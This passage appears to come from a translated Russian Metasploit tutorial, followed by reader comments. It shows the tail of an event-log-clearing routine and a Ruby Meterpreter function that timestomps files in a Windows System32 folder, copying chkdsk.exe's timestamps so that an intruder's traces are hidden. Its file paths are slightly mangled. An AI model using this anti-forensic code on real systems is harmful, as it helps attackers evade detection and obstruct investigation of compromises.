print_status("Error clearing Event Log: #{e.class} #{e}") end end
Функция для изменения времени доступа к файлу, времени модификации и времени создания файла.
#------------------------------------------------------------------------------- # The files have to be in %WinDir%System32 folder. def chmace(session,cmds) windir = '' windrtmp = "" print_status("Changing Access Time, Modified Time and Created Time of Files Used") windir = session.fs.file.expand_path("%WinDir%") cmds.each do |c| begin session.core.use("priv") filetostomp = windir + "system32"+ c fl2clone = windir + "system32chkdsk.exe" print_status("tChanging file MACE attributes on #{filetostomp}") session.priv.fs.set_file_mace_from_file(filetostomp, fl2clone) rescue ::Exception => e print_status("Error changing MACE: #{e.class} #{e}") end end end
На этом восьмую часть курса можно считать завершенной, до встречи в следующих частях на bruteforcer.ru.
Источник:
Перевод: Э_L_A_Y
Рубрика:
Metasploit
Великолепный, мощнейший сайт!! качество перевода выше всяких похвал. Пожалуйста небросайте проект!!!!! Больше переводов статей!!! материал один из уникальных!!! Проверяю каждый день, читаю статьи и учусь. Для специалистов по ИБ бесценный опыт!!!
Успехов и больше материалов! Спасибо за ваш труд.
с ув D13.
Спасибо за отзыв, сейчас, кстати, вот-вот должен выйти BackTrack4 final, там много чего интересного должно быть о чем можно написать.